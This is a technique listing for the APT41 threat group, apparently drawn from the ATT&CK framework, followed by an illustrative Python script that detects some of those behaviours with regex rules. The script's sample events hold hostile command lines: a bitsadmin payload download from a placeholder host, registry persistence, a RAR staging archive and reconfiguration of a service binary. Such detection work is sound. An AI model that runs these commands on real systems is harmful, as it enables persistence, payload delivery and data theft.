Techniques Used (Enterprise domain)

Application Layer Protocol: File Transfer Protocols
    APT41 used exploit payloads that initiate download via FTP.

Application Layer Protocol: Web Protocols
    APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.

Archive Collected Data: Archive via Utility
    APT41 created a RAR archive of targeted files for exfiltration.

BITS Jobs
    APT41 used BITSAdmin to download and install payloads.

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
    APT41 created and modified startup files for persistence. APT41 added a registry key in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to establish persistence for Cobalt Strike.

Brute Force: Password Guessing
    APT41 performed password brute-force attacks on the local admin account.

Command and Scripting Interpreter: PowerShell
    APT41 leveraged PowerShell to deploy malware families in victims' environments.

Command and Scripting Interpreter: Windows Command Shell
    APT41 used cmd.exe /c to execute commands on remote machines. APT41 used a batch file to install persistence for the Cobalt Strike BEACON loader.

Command and Scripting Interpreter: Unix Shell
    APT41 executed the file /bin/pwd in activity exploiting CVE-2019-19781 against Citrix devices.

Create Account: Local Account
    APT41 created user accounts and added them to the User and Admin groups.

Create or Modify System Process: Windows Service
    APT41 modified legitimate Windows services to install malware backdoors.
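As an added illustration (not part of the original technique table, and not any vendor's detection content), the following Python sketch matches several of the APT41 behaviours listed above against constructed process-creation command lines. The event format, the RULES patterns and the match_events function are my own assumptions for the example.

```python
import re
from typing import List, Tuple

# Constructed sample process-creation events, one per line, in the
# assumed form "<image path> <command line>". These are NOT real telemetry.
SAMPLE_EVENTS = [
    r'C:\Windows\System32\bitsadmin.exe bitsadmin /transfer job /download /priority high http://example.invalid/p.bin C:\Users\Public\p.bin',
    r'C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v netsvcs /t REG_MULTI_SZ /d placeholder_svc /f',
    r'C:\Tools\rar.exe rar a -hp C:\Users\Public\out.rar C:\Finance\*.xlsx',
    r'C:\Windows\System32\sc.exe sc config WinDefend binPath= "C:\Users\Public\placeholder.exe"',
    r'C:\Windows\System32\cmd.exe cmd.exe /c whoami',
    r'C:\Windows\System32\notepad.exe notepad.exe readme.txt',
]

# Hypothetical rules keyed to the technique names on this page. Each pattern
# is deliberately narrow; in production you would tune these to your estate.
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    # BITS Jobs: BITSAdmin used to fetch and stage payloads
    ("BITS Jobs",
     re.compile(r"\bbitsadmin(\.exe)?\s+/(transfer|addfile|resume)\b", re.I)),
    # Registry persistence via the Svchost service-group key named on the page
    ("Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder",
     re.compile(r"\breg(\.exe)?\s+add\s+.*CurrentVersion\\Svchost", re.I)),
    # Archive via Utility: RAR invoked with the 'add to archive' command
    ("Archive Collected Data: Archive via Utility",
     re.compile(r"\brar(\.exe)?\s+a\b", re.I)),
    # Windows Service: existing service binary path reconfigured
    ("Create or Modify System Process: Windows Service",
     re.compile(r"\bsc(\.exe)?\s+(config|create)\b.*binpath", re.I)),
]


def match_events(events: List[str]) -> List[Tuple[str, str]]:
    """Return (technique, event) pairs for every rule that matches an event.

    Matches are triage leads, not verdicts: rar.exe and sc.exe also appear in
    legitimate administration, so each hit still needs analyst review.
    """
    hits: List[Tuple[str, str]] = []
    for line in events:
        for technique, pattern in RULES:
            if pattern.search(line):
                hits.append((technique, line))
    return hits


if __name__ == "__main__":
    for technique, event in match_events(SAMPLE_EVENTS):
        print(f"[{technique}] {event}")
```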